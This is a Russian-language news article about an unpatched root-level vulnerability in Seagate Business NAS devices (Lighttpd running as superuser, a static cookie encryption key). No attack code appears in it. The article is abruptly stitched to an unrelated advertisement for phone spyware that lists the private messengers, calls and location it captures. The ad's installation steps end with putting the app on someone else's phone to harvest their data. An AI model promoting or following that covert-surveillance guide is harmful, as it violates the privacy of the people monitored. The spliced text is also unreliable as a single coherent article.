Уязвимость в NAS Seagate позволяет хакеру взломать систему

574c950c7c92cc1e1ff5e7f14794ac08Курьёзность ситуации заключается в том, что сами представители компании Seagate ситуацию никак не комментируют, а программисты брешь не закрыли. В итоге уже четыре месяца в безопасности присутствует серьёзная дыра, которая может использоваться злоумышленниками.

Найденная проблема позволяет удалённо скомпрометировать всю рабочую систему, а также получить доступ к различным секторам памяти. Главной же особенностью целенаправленного использования бреши становится получение привилегий суперпользователя, что позволило бы полностью управлять системой.

Все сведения и отчёты об уязвимости были опубликованы на портале Beyond Binary, а автором выступил Оу-Джей Ривз, видный исследователь в области безопасности. Статья не являлась учебным пособием по взлому, но её вполне могли использовать хакеры для проведения атак. Ривз лично отправил письмо Seagate, где описал обнаруженную ошибку. Однако ответа не последовало. Программисты Seagate не стали комментировать ситуацию, до сих пор не выпустили исправление, и даже не написали, собираются ли исправлять обнаруженную ошибку.

Представленные Seagate NAS-решения называются Seagate Business, контролируются они посредством специально разработанного веб-интерфейса. Его использование происходит через устаревшие протоколы передачи данных, которые и сами по себе-то не являются идеально защищёнными.

Ещё одной проблемой, выявленной специалистом по безопасности, является ключ шифрования. Он не генерируется каждый раз, когда пользователь обращается к сервису. У пользователя такой ключ остаётся постоянным, поэтому все данные сохраняются в файле cookie. Нужно ли говорить о том, что этот файл может быть подменён? У хакеров открываются отличные возможности по взлому всей системы в целом.

В веб-приложении используется та версия Lighttpd, которая разработана для взаимодействия с правами суперпользователя системы. В некоторых ситуациях это удобно, но только не в данной! В итоге получается, что любые удалённые хакерские действия, направленные против Lighttpd, автоматически приведут к тому, что все команды злоумышленника будут передаваться сразу на уровне суперпользователя. Вся остальная система безопасности NAS уже не будет иметь никакого значения. Эта ошибка также не была исправлена Seagate.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.